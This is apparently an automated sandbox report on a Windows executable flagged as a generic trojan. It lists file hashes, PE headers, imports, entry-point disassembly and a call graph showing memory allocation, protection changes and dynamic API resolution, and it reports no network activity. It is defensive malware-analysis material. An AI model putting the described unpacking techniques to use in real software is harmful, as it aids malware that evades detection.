    No created / dropped files found
    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):5.899033758996376
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
    File size:182'272 bytes
    MD5:69b4504419872fee9bc3bc996b88eb4b
    SHA1:f87cd6cc91070bb3331fe6c6e25ac84b840f0c50
    SHA256:0a06c8a177765ec2e723da7b9d406eb68c43541a6740ffa395a7297ed94e0d73
    SHA512:42cfa507f0ff1f4baecb45a7bd02cbe21165e5e23b1fb8ad4189c4e7fe509935781cc8a0c5c2eb046d4031d1ed3f218f7927b3d6fa96d0f5b97ee302b8a8944b
    SSDEEP:3072:TCmlA+2TGMF85+bkRG32foUP9GmPe97UoiBwASziH8shMpy4a7tzHhL1NZ:WmlV4h8JG3QUzoTnhM84a7trhL1NZ
    TLSH:FC047D0030D4D2B3D5722A33169346C5A93DFA719F96CAFB270C795D87B05A29B32DA2
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`J...$R..$R..$R.j'S..$R.j!SE.$R.j S..$RHz S..$RHz'S..$RHz!S..$R.j%S..$R..%R..$REz-S..$REz.R..$R...R..$REz&S..$RRich..$R.......
    Icon Hash:00928e8e8686b000
    Entrypoint:0x403d44
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp:0x65D59C0C [Wed Feb 21 06:45:32 2024 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:6
    OS Version Minor:0
    File Version Major:6
    File Version Minor:0
    Subsystem Version Major:6
    Subsystem Version Minor:0
    Import Hash:66deda4204cb009d8c01c3f28c17567f
    Instruction
    call 00007FF8553C173Ch
    jmp 00007FF8553C11AFh
    push ebp
    mov ebp, esp
    push 00000000h
    call dword ptr [0041105Ch]
    push dword ptr [ebp+08h]
    call dword ptr [00411058h]
    push C0000409h
    call dword ptr [0041100Ch]
    push eax
    call dword ptr [00411014h]
    pop ebp
    ret
    push ebp
    mov ebp, esp
    sub esp, 00000324h
    push 00000017h
    call dword ptr [00411060h]
    test eax, eax
    je 00007FF8553C1337h
    push 00000002h
    pop ecx
    int 29h
    mov dword ptr [00418A78h], eax
    mov dword ptr [00418A74h], ecx
    mov dword ptr [00418A70h], edx
    mov dword ptr [00418A6Ch], ebx
    mov dword ptr [00418A68h], esi
    mov dword ptr [00418A64h], edi
    mov word ptr [00418A90h], ss
    mov word ptr [00418A84h], cs
    mov word ptr [00418A60h], ds
    mov word ptr [00418A5Ch], es
    mov word ptr [00418A58h], fs
    mov word ptr [00418A54h], gs
    pushfd
    pop dword ptr [00418A88h]
    mov eax, dword ptr [ebp+00h]
    mov dword ptr [00418A7Ch], eax
    mov eax, dword ptr [ebp+04h]
    mov dword ptr [00418A80h], eax
    lea eax, dword ptr [ebp+08h]
    mov dword ptr [00418A8Ch], eax
    mov eax, dword ptr [ebp-00000324h]
    mov dword ptr [004189C8h], 00010001h
    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x176900x3c.rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x13c40.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000x1130.reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG0x166980x38.rdata
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x165d80x40.rdata
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x110000x120.rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000xfbea0xfc00f80c6e36c0496492e658927e9cbd2f9aFalse0.5602368551587301data6.555752738036374IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata0x110000x6d0c0x6e0006a44f2522af6deb8eae500514137c22False0.4388494318181818OpenPGP Public Key4.883697607623019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data0x180000x163c0xa00b55402247df1a6c6692e0c2bccb8e505False0.1765625data2.3846615292625706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rsrc0x1a0000x13c400x13e00ad6b64a3eb4456238b7b6cc15ca6feecFalse0.49750638757861637data4.908644275138926IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .reloc0x2e0000x11300x12006250f4910a879ac182f4b8379731bb76False0.7437065972222222data6.405937874038831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
    NameRVASizeTypeLanguageCountryZLIB Complexity
    RT_DIALOG0x1a1180x18cdataEnglishUnited States0.6464646464646465
    RT_RCDATA0x1a2a40x1adataEnglishUnited States1.3461538461538463
    RT_RCDATA0x1a2c00x13800dataEnglishUnited States0.4989483173076923
    RT_MANIFEST0x2dac00x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
    DLLImport
    KERNEL32.dllVirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer
    GDI32.dllLPtoDP
    Language of compilation systemCountry where language is spokenMap
    EnglishUnited States
    No network behavior found

    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Target ID:0
    Start time:15:28:10
    Start date:16/04/2024
    Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe"
    Imagebase:0xfb0000
    File size:182'272 bytes
    MD5 hash:69B4504419872FEE9BC3BC996B88EB4B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:true

    Reset < >

      Execution Graph

      Execution Coverage:7.4%
      Dynamic/Decrypted Code Coverage:17.3%
      Signature Coverage:16.9%
      Total number of Nodes:1244
      Total number of Limit Nodes:10
      execution_graph 10591 fb3bc8 10592 fb3bd4 __FrameHandler3::FrameUnwindToState 10591->10592 10617 fb3f25 10592->10617 10594 fb3bdb 10595 fb3d2e 10594->10595 10606 fb3c05 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 10594->10606 10660 fb421c IsProcessorFeaturePresent 10595->10660 10597 fb3d35 10664 fb76e3 10597->10664 10602 fb3c24 10603 fb3ca5 10625 fb4337 10603->10625 10605 fb3cab 10629 fb2f40 10605->10629 10606->10602 10606->10603 10643 fb76bd 10606->10643 10612 fb3ccb 10613 fb3cd4 10612->10613 10651 fb7698 10612->10651 10654 fb4099 10613->10654 10618 fb3f2e 10617->10618 10670 fb44c5 IsProcessorFeaturePresent 10618->10670 10622 fb3f3f 10623 fb3f43 10622->10623 10680 fb4ecd 10622->10680 10623->10594 10740 fb4f20 10625->10740 10628 fb435d 10628->10605 10742 fb2ae0 10629->10742 10632 fb2f8c ExitProcess 10633 fb2f81 GetLastError 10633->10632 10634 fb2f94 BuildCommDCBAndTimeoutsA 10633->10634 10635 fb2fa7 GetCurrentProcess TerminateProcess 10634->10635 10636 fb2fb6 10634->10636 10635->10636 10814 fb1710 10636->10814 10642 fb2fe0 10649 fb436d GetModuleHandleW 10642->10649 10644 fb76d3 __FrameHandler3::FrameUnwindToState _unexpected 10643->10644 10644->10603 11245 fb832a GetLastError 10644->11245 10650 fb3cc7 10649->10650 10650->10597 10650->10612 11794 fb753e 10651->11794 10655 fb40a5 10654->10655 10656 fb3cdc 10655->10656 11864 fb7cfb 10655->11864 10656->10602 10658 fb40b3 10659 fb4ecd ___scrt_uninitialize_crt 7 API calls 10658->10659 10659->10656 10661 fb4232 _unexpected 10660->10661 10662 fb42dd IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10661->10662 10663 fb4328 _unexpected 10662->10663 10663->10597 10665 fb753e _unexpected 23 API calls 10664->10665 10666 fb3d3b 10665->10666 10667 fb76a7 10666->10667 10668 fb753e _unexpected 23 API calls 10667->10668 10669 fb3d43 10668->10669 10671 fb3f3a 10670->10671 10672 fb4eae 10671->10672 10686 fb60a7 10672->10686 10676 fb4ebf 10677 fb4eca 10676->10677 10700 fb60e3 10676->10700 10677->10622 10679 fb4eb7 10679->10622 10681 fb4ee0 10680->10681 10682 fb4ed6 10680->10682 10681->10623 10683 fb5169 ___vcrt_uninitialize_ptd 6 API calls 10682->10683 10684 fb4edb 10683->10684 10685 fb60e3 ___vcrt_uninitialize_locks DeleteCriticalSection 10684->10685 10685->10681 10687 fb60b0 10686->10687 10689 fb60d9 10687->10689 10691 fb4eb3 10687->10691 10704 fb62ec 10687->10704 10690 fb60e3 ___vcrt_uninitialize_locks DeleteCriticalSection 10689->10690 10690->10691 10691->10679 10692 fb5136 10691->10692 10721 fb61fd 10692->10721 10695 fb514b 10695->10676 10698 fb5166 10698->10676 10701 fb610d 10700->10701 10702 fb60ee 10700->10702 10701->10679 10703 fb60f8 DeleteCriticalSection 10702->10703 10703->10701 10703->10703 10709 fb6112 10704->10709 10707 fb6324 InitializeCriticalSectionAndSpinCount 10708 fb630f 10707->10708 10708->10687 10710 fb612f 10709->10710 10713 fb6133 10709->10713 10710->10707 10710->10708 10711 fb619b GetProcAddress 10711->10710 10713->10710 10713->10711 10714 fb618c 10713->10714 10716 fb61b2 LoadLibraryExW 10713->10716 10714->10711 10715 fb6194 FreeLibrary 10714->10715 10715->10711 10717 fb61f9 10716->10717 10718 fb61c9 GetLastError 10716->10718 10717->10713 10718->10717 10719 fb61d4 ___vcrt_FlsGetValue 10718->10719 10719->10717 10720 fb61ea LoadLibraryExW 10719->10720 10720->10713 10722 fb6112 ___vcrt_FlsGetValue 5 API calls 10721->10722 10723 fb6217 10722->10723 10724 fb6230 TlsAlloc 10723->10724 10725 fb5140 10723->10725 10725->10695 10726 fb62ae 10725->10726 10727 fb6112 ___vcrt_FlsGetValue 5 API calls 10726->10727 10728 fb62c8 10727->10728 10729 fb62e3 TlsSetValue 10728->10729 10730 fb5159 10728->10730 10729->10730 10730->10698 10731 fb5169 10730->10731 10732 fb5173 10731->10732 10733 fb5179 10731->10733 10735 fb6238 10732->10735 10733->10695 10736 fb6112 ___vcrt_FlsGetValue 5 API calls 10735->10736 10737 fb6252 10736->10737 10738 fb626a TlsFree 10737->10738 10739 fb625e 10737->10739 10738->10739 10739->10733 10741 fb434a GetStartupInfoW 10740->10741 10741->10628 10743 fb2b16 10742->10743 10845 fb3040 10743->10845 10748 fb3040 27 API calls 10749 fb2bb9 10748->10749 10870 fb2870 10749->10870 10752 fb3040 27 API calls 10753 fb2c1c 10752->10753 10873 fb28a0 10753->10873 10758 fb3040 27 API calls 10759 fb2c5c 10758->10759 10760 fb3040 27 API calls 10759->10760 10761 fb2c75 10760->10761 10893 fb2a60 10761->10893 10765 fb2c9b 10766 fb3040 27 API calls 10765->10766 10767 fb2cd2 10766->10767 10768 fb3040 27 API calls 10767->10768 10769 fb2d05 10768->10769 10903 fb2450 10769->10903 10772 fb3040 27 API calls 10773 fb2d23 10772->10773 10922 fb2540 10773->10922 10780 fb3040 27 API calls 10781 fb2d7b 10780->10781 10782 fb3040 27 API calls 10781->10782 10783 fb2d94 10782->10783 10784 fb3040 27 API calls 10783->10784 10785 fb2dad 10784->10785 10969 fb1e90 10785->10969 10788 fb3040 27 API calls 10789 fb2df2 10788->10789 10790 fb3040 27 API calls 10789->10790 10791 fb2e1b 10790->10791 10998 fb1ff0 10791->10998 10794 fb3040 27 API calls 10795 fb2e40 10794->10795 11009 fb2090 10795->11009 10798 fb3020 task 25 API calls 10799 fb2e5d 10798->10799 10800 fb3040 27 API calls 10799->10800 10801 fb2e6f 10800->10801 10802 fb3040 27 API calls 10801->10802 10803 fb2e88 10802->10803 10804 fb3040 27 API calls 10803->10804 10805 fb2ea1 10804->10805 10806 fb3040 27 API calls 10805->10806 10807 fb2eba 10806->10807 10808 fb3040 27 API calls 10807->10808 10809 fb2ed9 10808->10809 10810 fb3020 task 25 API calls 10809->10810 10811 fb2f01 10810->10811 11014 fb21a0 10811->11014 11224 fb1110 GetModuleHandleA 10814->11224 10816 fb173c 10817 fb1110 17 API calls 10816->10817 10820 fb1750 10817->10820 10818 fb6940 ___std_exception_destroy 14 API calls 10819 fb1848 10818->10819 10821 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10819->10821 10822 fb6b68 ___std_exception_copy 15 API calls 10820->10822 10830 fb183c 10820->10830 10823 fb1855 10821->10823 10824 fb178f 10822->10824 10831 fb2ff0 10823->10831 11230 fb1300 GetModuleHandleA VirtualAlloc 10824->11230 10827 fb6940 ___std_exception_destroy 14 API calls 10828 fb1830 10827->10828 10829 fb6940 ___std_exception_destroy 14 API calls 10828->10829 10829->10830 10830->10818 10832 fb3020 task 25 API calls 10831->10832 10833 fb3002 10832->10833 10834 fb3020 task 25 API calls 10833->10834 10835 fb300d 10834->10835 10836 fb3020 task 25 API calls 10835->10836 10837 fb2fd0 10836->10837 10838 fb3a94 10837->10838 10839 fb3a9d IsProcessorFeaturePresent 10838->10839 10840 fb3a9c 10838->10840 10842 fb3d8b 10839->10842 10840->10642 11244 fb3d4e SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10842->11244 10844 fb3e6e 10844->10642 10846 fb3075 operator!= char_traits 10845->10846 11049 fb3440 10846->11049 10849 fb26f0 10850 fb3040 27 API calls 10849->10850 10851 fb2753 10850->10851 10852 fb3040 27 API calls 10851->10852 10853 fb2779 10852->10853 10854 fb3040 27 API calls 10853->10854 10855 fb2791 10854->10855 10856 fb3040 27 API calls 10855->10856 10857 fb27ae operator!= 10856->10857 10858 fb3020 task 25 API calls 10857->10858 10859 fb27cf 10858->10859 10860 fb3020 task 25 API calls 10859->10860 10862 fb27de 10860->10862 10861 fb3020 task 25 API calls 10863 fb282e 10861->10863 10862->10861 10864 fb3020 task 25 API calls 10863->10864 10865 fb283a 10864->10865 10866 fb3020 task 25 API calls 10865->10866 10867 fb2849 10866->10867 10868 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10867->10868 10869 fb285e 10868->10869 10869->10748 10871 fb3020 task 25 API calls 10870->10871 10872 fb288e 10871->10872 10872->10752 10874 fb3040 27 API calls 10873->10874 10875 fb28e6 10874->10875 10876 fb3040 27 API calls 10875->10876 10877 fb290f 10876->10877 10878 fb3020 task 25 API calls 10877->10878 10879 fb29b7 10878->10879 10880 fb3020 task 25 API calls 10879->10880 10881 fb29c3 10880->10881 10882 fb3020 task 25 API calls 10881->10882 10883 fb29d2 10882->10883 10884 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10883->10884 10885 fb29e7 10884->10885 10886 fb29f0 10885->10886 10887 fb3040 27 API calls 10886->10887 10890 fb2a14 10887->10890 10888 fb3020 task 25 API calls 10889 fb2a48 10888->10889 10891 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10889->10891 10890->10888 10892 fb2a52 10891->10892 10892->10758 10894 fb3040 27 API calls 10893->10894 10895 fb2aa3 10894->10895 10896 fb3020 task 25 API calls 10895->10896 10897 fb2ab8 10896->10897 10898 fb3020 task 25 API calls 10897->10898 10899 fb2ac7 10898->10899 10900 fb3020 10899->10900 11209 fb3160 10900->11209 10902 fb302f task 10902->10765 10904 fb3040 27 API calls 10903->10904 10905 fb248f 10904->10905 10906 fb3040 27 API calls 10905->10906 10907 fb24ad 10906->10907 10908 fb3040 27 API calls 10907->10908 10909 fb24dc 10908->10909 10910 fb3020 task 25 API calls 10909->10910 10911 fb24eb 10910->10911 10912 fb3020 task 25 API calls 10911->10912 10913 fb24f7 10912->10913 10914 fb3020 task 25 API calls 10913->10914 10915 fb2503 10914->10915 10916 fb3020 task 25 API calls 10915->10916 10917 fb250f 10916->10917 10918 fb3020 task 25 API calls 10917->10918 10919 fb251e 10918->10919 10920 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10919->10920 10921 fb2536 10920->10921 10921->10772 10923 fb3040 27 API calls 10922->10923 10926 fb258f 10923->10926 10924 fb3040 27 API calls 10925 fb25e1 10924->10925 10927 fb3040 27 API calls 10925->10927 10926->10924 10928 fb25fb operator!= 10927->10928 10929 fb3020 task 25 API calls 10928->10929 10930 fb2619 10929->10930 10931 fb3020 task 25 API calls 10930->10931 10933 fb2628 10931->10933 10932 fb3020 task 25 API calls 10934 fb26c2 10932->10934 10933->10932 10935 fb3020 task 25 API calls 10934->10935 10936 fb26d1 10935->10936 10937 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10936->10937 10938 fb26e6 10937->10938 10939 fb1bd0 10938->10939 10940 fb3040 27 API calls 10939->10940 10941 fb1c15 10940->10941 10942 fb3040 27 API calls 10941->10942 10943 fb1c30 10942->10943 10944 fb3040 27 API calls 10943->10944 10945 fb1c4a operator!= 10944->10945 10946 fb3020 task 25 API calls 10945->10946 10947 fb1c68 10946->10947 10948 fb3020 task 25 API calls 10947->10948 10950 fb1c77 10948->10950 10949 fb3020 task 25 API calls 10951 fb1d14 10949->10951 10950->10949 10952 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10951->10952 10953 fb1d29 10952->10953 10954 fb1d30 10953->10954 10955 fb3040 27 API calls 10954->10955 10956 fb1d68 10955->10956 10957 fb3040 27 API calls 10956->10957 10958 fb1d94 10957->10958 10959 fb3040 27 API calls 10958->10959 10960 fb1dae operator!= 10959->10960 10961 fb3020 task 25 API calls 10960->10961 10962 fb1dcc 10961->10962 10963 fb3020 task 25 API calls 10962->10963 10964 fb1ddb 10963->10964 10965 fb3020 task 25 API calls 10964->10965 10966 fb1e73 10965->10966 10967 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10966->10967 10968 fb1e88 10967->10968 10968->10780 10970 fb3040 27 API calls 10969->10970 10971 fb1ed2 10970->10971 10972 fb3040 27 API calls 10971->10972 10973 fb1eea 10972->10973 10974 fb3040 27 API calls 10973->10974 10975 fb1f03 10974->10975 10976 fb3040 27 API calls 10975->10976 10977 fb1f17 10976->10977 10978 fb3040 27 API calls 10977->10978 10979 fb1f34 operator!= 10978->10979 10980 fb3020 task 25 API calls 10979->10980 10981 fb1f55 10980->10981 10982 fb3020 task 25 API calls 10981->10982 10984 fb1f64 10982->10984 10983 fb3020 task 25 API calls 10985 fb1f94 10983->10985 10984->10983 10986 fb3020 task 25 API calls 10985->10986 10987 fb1fa0 10986->10987 10988 fb3020 task 25 API calls 10987->10988 10989 fb1fac 10988->10989 10990 fb3020 task 25 API calls 10989->10990 10991 fb1fb8 10990->10991 10992 fb3020 task 25 API calls 10991->10992 10993 fb1fc4 10992->10993 10994 fb3020 task 25 API calls 10993->10994 10995 fb1fd3 10994->10995 10996 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10995->10996 10997 fb1fe8 10996->10997 10997->10788 10999 fb3040 27 API calls 10998->10999 11000 fb2036 10999->11000 11001 fb3020 task 25 API calls 11000->11001 11002 fb204f 11001->11002 11003 fb3020 task 25 API calls 11002->11003 11004 fb205b 11003->11004 11005 fb3020 task 25 API calls 11004->11005 11006 fb206a 11005->11006 11007 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11006->11007 11008 fb2082 11007->11008 11008->10794 11010 fb3040 27 API calls 11009->11010 11011 fb20d3 11010->11011 11012 fb3020 task 25 API calls 11011->11012 11013 fb20eb 11012->11013 11013->10798 11015 fb3040 27 API calls 11014->11015 11016 fb21de 11015->11016 11017 fb3040 27 API calls 11016->11017 11018 fb21f2 11017->11018 11019 fb3040 27 API calls 11018->11019 11020 fb2203 11019->11020 11021 fb3040 27 API calls 11020->11021 11022 fb2214 11021->11022 11023 fb3040 27 API calls 11022->11023 11024 fb225a 11023->11024 11025 fb3040 27 API calls 11024->11025 11026 fb2280 operator!= 11025->11026 11027 fb3020 task 25 API calls 11026->11027 11028 fb22aa 11027->11028 11029 fb3020 task 25 API calls 11028->11029 11031 fb22b9 11029->11031 11030 fb3040 27 API calls 11032 fb235e 11030->11032 11031->11030 11033 fb3040 27 API calls 11032->11033 11034 fb2384 operator!= 11033->11034 11035 fb3020 task 25 API calls 11034->11035 11036 fb23ae 11035->11036 11037 fb3020 task 25 API calls 11036->11037 11038 fb23bd 11037->11038 11039 fb3020 task 25 API calls 11038->11039 11040 fb2403 11039->11040 11041 fb3020 task 25 API calls 11040->11041 11042 fb240f 11041->11042 11043 fb3020 task 25 API calls 11042->11043 11044 fb241b 11043->11044 11045 fb3020 task 25 API calls 11044->11045 11046 fb242a 11045->11046 11047 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11046->11047 11048 fb2445 LPtoDP 11047->11048 11048->10632 11048->10633 11060 fb3680 11049->11060 11052 fb3465 task 11059 fb34ab task operator!= 11052->11059 11067 fb3610 11052->11067 11057 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11058 fb2b68 11057->11058 11058->10849 11059->11057 11061 fb369b _Min_value task _Max_value 11060->11061 11062 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11061->11062 11063 fb345b 11062->11063 11063->11052 11064 fb1bc0 11063->11064 11076 fb3a74 11064->11076 11068 fb3680 5 API calls 11067->11068 11069 fb361f 11068->11069 11119 fb3790 11069->11119 11072 fb3730 11073 fb3740 allocator 11072->11073 11123 fb38a0 11073->11123 11081 fb39fc 11076->11081 11080 fb3a93 11087 fb39ac 11081->11087 11084 fb4c96 11085 fb4cdd RaiseException 11084->11085 11086 fb4cb0 11084->11086 11085->11080 11086->11085 11090 fb4a5b 11087->11090 11091 fb39d8 11090->11091 11092 fb4a68 11090->11092 11091->11084 11092->11091 11098 fb6b68 11092->11098 11095 fb4a95 11116 fb6940 11095->11116 11100 fb857c 11098->11100 11099 fb85ba 11101 fb881d __dosmaperr 14 API calls 11099->11101 11100->11099 11102 fb85a5 HeapAlloc 11100->11102 11105 fb858e _unexpected 11100->11105 11103 fb4a85 11101->11103 11104 fb85b8 11102->11104 11102->11105 11103->11095 11107 fb7e0a 11103->11107 11104->11103 11105->11099 11105->11102 11106 fb6b82 _Allocate EnterCriticalSection LeaveCriticalSection 11105->11106 11106->11105 11108 fb7e25 11107->11108 11109 fb7e17 11107->11109 11110 fb881d __dosmaperr 14 API calls 11108->11110 11109->11108 11114 fb7e3c 11109->11114 11111 fb7e2d 11110->11111 11112 fb6b07 ___std_exception_copy 25 API calls 11111->11112 11113 fb7e37 11112->11113 11113->11095 11114->11113 11115 fb881d __dosmaperr 14 API calls 11114->11115 11115->11111 11117 fb7fb2 _free 14 API calls 11116->11117 11118 fb6958 11117->11118 11118->11091 11120 fb37b1 _Max_value 11119->11120 11121 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11120->11121 11122 fb350c 11121->11122 11122->11072 11124 fb38ac 11123->11124 11127 fb38ba 11123->11127 11129 fb3930 11124->11129 11126 fb3749 11126->11059 11127->11126 11137 fb1b00 11127->11137 11130 fb394c 11129->11130 11131 fb3947 11129->11131 11133 fb1b00 _Allocate 16 API calls 11130->11133 11140 fb1a80 11131->11140 11135 fb3955 11133->11135 11136 fb3970 11135->11136 11144 fb6b17 11135->11144 11136->11126 11190 fb3aa2 11137->11190 11141 fb1a8e stdext::threads::lock_error::lock_error 11140->11141 11142 fb4c96 Concurrency::cancel_current_task RaiseException 11141->11142 11143 fb1a9c 11142->11143 11143->11130 11149 fb6aa3 11144->11149 11146 fb6b26 11157 fb6b34 IsProcessorFeaturePresent 11146->11157 11148 fb6b33 11161 fb8481 GetLastError 11149->11161 11151 fb6aae 11152 fb6abc 11151->11152 11153 fb6b34 _Allocate 11 API calls 11151->11153 11152->11146 11154 fb6b06 11153->11154 11155 fb6aa3 _Allocate 25 API calls 11154->11155 11156 fb6b13 11155->11156 11156->11146 11158 fb6b40 11157->11158 11184 fb695b 11158->11184 11162 fb8498 11161->11162 11163 fb849e 11161->11163 11164 fba61d _unexpected 6 API calls 11162->11164 11165 fba65c _unexpected 6 API calls 11163->11165 11180 fb84a4 SetLastError 11163->11180 11164->11163 11166 fb84bc 11165->11166 11167 fb8830 _unexpected 12 API calls 11166->11167 11166->11180 11169 fb84cc 11167->11169 11170 fb84eb 11169->11170 11171 fb84d4 11169->11171 11173 fba65c _unexpected 6 API calls 11170->11173 11172 fba65c _unexpected 6 API calls 11171->11172 11181 fb84e2 11172->11181 11174 fb84f7 11173->11174 11175 fb84fb 11174->11175 11176 fb850c 11174->11176 11178 fba65c _unexpected 6 API calls 11175->11178 11179 fb8158 _unexpected 12 API calls 11176->11179 11177 fb7fb2 _free 12 API calls 11177->11180 11178->11181 11182 fb8517 11179->11182 11180->11151 11181->11177 11183 fb7fb2 _free 12 API calls 11182->11183 11183->11180 11185 fb6977 _unexpected 11184->11185 11186 fb69a3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11185->11186 11187 fb6a74 _unexpected 11186->11187 11188 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11187->11188 11189 fb6a92 GetCurrentProcess TerminateProcess 11188->11189 11189->11148 11193 fb3aa7 11190->11193 11191 fb6b68 ___std_exception_copy 15 API calls 11191->11193 11192 fb1b0c 11192->11126 11193->11191 11193->11192 11195 fb3ac3 _Allocate 11193->11195 11200 fb6b82 11193->11200 11196 fb3e8c stdext::threads::lock_error::lock_error 11195->11196 11198 fb4c96 Concurrency::cancel_current_task RaiseException 11195->11198 11197 fb4c96 Concurrency::cancel_current_task RaiseException 11196->11197 11199 fb3ea9 11197->11199 11198->11196 11203 fb6baf 11200->11203 11204 fb6bbb __FrameHandler3::FrameUnwindToState 11203->11204 11205 fb860b _unexpected EnterCriticalSection 11204->11205 11206 fb6bc6 11205->11206 11207 fb6c02 _Allocate LeaveCriticalSection 11206->11207 11208 fb6b8d 11207->11208 11208->11193 11211 fb3196 task 11209->11211 11210 fb31da task 11210->10902 11211->11210 11213 fb3360 11211->11213 11216 fb35b0 11213->11216 11215 fb3374 11215->11210 11217 fb35e8 _MallocaArrayHolder 11216->11217 11218 fb35db 11216->11218 11217->11215 11220 fb1b20 11218->11220 11221 fb1b5e 11220->11221 11222 fb6b17 _Allocate 25 API calls 11221->11222 11223 fb1b79 11221->11223 11222->11221 11223->11217 11225 fb1132 11224->11225 11226 fb115a GetModuleHandleW 11225->11226 11227 fb117f 11226->11227 11228 fb6b68 ___std_exception_copy 15 API calls 11227->11228 11229 fb11ad __InternalCxxFrameHandler 11227->11229 11228->11229 11229->10816 11238 fb1359 __InternalCxxFrameHandler 11230->11238 11240 fb1352 11230->11240 11231 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11232 fb16b0 GetPEB GetUserDefaultLangID 11231->11232 11232->10827 11233 fb14ef 11234 fb1508 VirtualProtect 11233->11234 11235 fb152a 11234->11235 11237 fb1573 VirtualFree 11235->11237 11235->11240 11242 fb1593 VirtualProtect 11235->11242 11236 fb142f GetModuleHandleA GetProcAddress 